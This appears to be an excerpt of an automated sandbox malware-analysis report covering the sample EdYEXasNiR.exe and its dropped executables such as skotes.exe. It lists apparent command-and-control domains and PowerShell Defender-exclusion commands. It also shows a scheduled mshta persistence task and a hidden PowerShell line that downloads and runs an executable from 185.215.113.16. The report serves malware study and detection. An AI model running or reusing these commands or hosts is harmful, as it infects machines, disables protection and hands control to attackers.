                                    Source: EdYEXasNiR.exe, 00000000.00000003.1549293280.0000000005480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: abruptyopsn.shop
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1549293280.0000000005480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: nearycrepso.shop
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1549293280.0000000005480000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: fancywaxxers.shop
                                    Source: 64252d274d.exe, 00000022.00000002.2284078909.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: bashfulacid.lat
                                    Source: 64252d274d.exe, 00000022.00000002.2284078909.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: tentabatte.lat
                                    Source: 64252d274d.exe, 00000022.00000002.2284078909.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: curverpluch.lat
                                    Source: 64252d274d.exe, 00000022.00000002.2284078909.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: talkynicer.lat
                                    Source: 64252d274d.exe, 00000022.00000002.2284078909.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: shapestickyr.lat
                                    Source: 64252d274d.exe, 00000022.00000002.2284078909.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: manyrestro.lat
                                    Source: 64252d274d.exe, 00000022.00000002.2284078909.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: slipperyloo.lat
                                    Source: 64252d274d.exe, 00000022.00000002.2284078909.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wordyfindy.lat
                                    Source: 64252d274d.exe, 00000022.00000002.2284078909.0000000002EA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pancakedipyps.click
                                    Source: 696689ce6d.exe, 0000002F.00000002.4902312767.0000000000A70000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                                    Source: 696689ce6d.exe, 0000002F.00000002.4902312767.0000000000A70000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                                    Source: 696689ce6d.exe, 0000002F.00000002.4902312767.0000000000A70000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                                    Source: 696689ce6d.exe, 0000002F.00000002.4902312767.0000000000A70000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                                    Source: 696689ce6d.exe, 0000002F.00000002.4902312767.0000000000A70000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                                    Source: 696689ce6d.exe, 0000002F.00000002.4902312767.0000000000A70000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                                    Source: 696689ce6d.exe, 0000002F.00000002.4902312767.0000000000A70000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                                    Source: 696689ce6d.exe, 0000002F.00000002.4902312767.0000000000A70000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                                    Source: 696689ce6d.exe, 0000002F.00000002.4902312767.0000000000A70000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: fieldhitty.click
                                    Source: jyidkjkfhjawd.exe, 00000041.00000002.2848173561.0000000000881000.00000040.00000001.01000000.0000001D.sdmpString found in binary or memory: abruptyopsn.shoph
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 --field-trial-handle=2152,i,11031812561136754540,12085514892588274456,262144 /prefetch:8Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe "C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe "C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe "C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe "C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknown
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\HJEHIJEBKE.exe "C:\Users\user\Documents\HJEHIJEBKE.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\wOXcVegx'
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeProcess created: C:\wOXcVegx\jyidkjkfhjawd.exe "C:\wOXcVegx\jyidkjkfhjawd.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeProcess created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe "C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe" any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe any_word
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeProcess created: unknown unknown
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C584760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,3_2_6C584760
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C461C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,3_2_6C461C30
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2213989186.0000000001312000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: Program Manager
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe, 456YTTQ213T2RO9QAEYSNNZDL.exe, 00000005.00000002.1876549211.00000000010AD000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, skotes.exe, 00000006.00000002.1915902922.000000000118D000.00000040.00000001.01000000.0000000A.sdmpBinary or memory string: lProgram Manager
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C53AE71 cpuid 3_2_6C53AE71
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027567001\95ba65f98f.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027567001\95ba65f98f.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027568001\8663788bd2.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027568001\8663788bd2.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027569001\f2a96255ac.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027569001\f2a96255ac.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027570001\85c59433f4.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027570001\85c59433f4.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027571001\ccb71f0bac.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027571001\ccb71f0bac.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027572001\568p2nk.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027572001\568p2nk.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027573001\eIgpINK.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027573001\eIgpINK.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027574001\eO7MwvK.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027574001\eO7MwvK.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027575001\e18644e148.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027575001\e18644e148.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027576001\0bf9323d7e.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027576001\0bf9323d7e.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027577001\ad25d67005.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027577001\ad25d67005.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027578001\4c4716526e.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027578001\4c4716526e.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: unknown VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
